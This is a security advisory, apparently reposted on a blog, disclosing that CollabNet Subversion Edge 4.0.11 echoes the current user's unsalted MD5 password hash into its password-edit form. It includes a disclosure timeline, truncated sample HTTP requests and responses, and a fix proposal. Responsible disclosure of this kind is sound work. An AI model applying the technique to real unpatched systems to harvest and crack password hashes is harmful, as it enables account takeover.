# (hash) leak
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Credential leak
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
Timeline:
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
Summary:
The CollabNet Subversion Edge Management Frontend leaks the unsalted MD5 hash of
password of the currently logged in user via a "POST /csvn/user/index" request.
An attacker that exploits an XSS or has gained a valid session via other means
is able to retrieve the unsalted MD5 hash of the corresponding user and easily
crack the hash in order to know the users password.
Request 1 (set password)
POST /csvn/user/index HTTP/1.1
Host: example.com:4434
[...]
id=5&version=15&passwd_change_
Response 1:
HTTP/1.1 302 Found
[...]
Location: https://example.com:4434/csvn/
Content-Length: 0
Request 2 (generated by clicking edit in the following page; request below the iamge):
GET /csvn/user/edit/5 HTTP/1.1
Host: example.com:4434
[...]
Cookie: SESSID=xxxxxxxxxxxxxxxxxxxx;
Response 2 (leaked hash read from DB and echoed back into password change form):
HTTP/1.1 200 OK
[...]
<input type="password" id="passwd" name="passwd" value="
Fix proposal:
Do not echo the current hash in the database back to the user when changing the
password. Only accept passwords as input fields and no hashes.
Vendor fix:
The leak is plugged.
Komentarų nėra:
Rašyti komentarą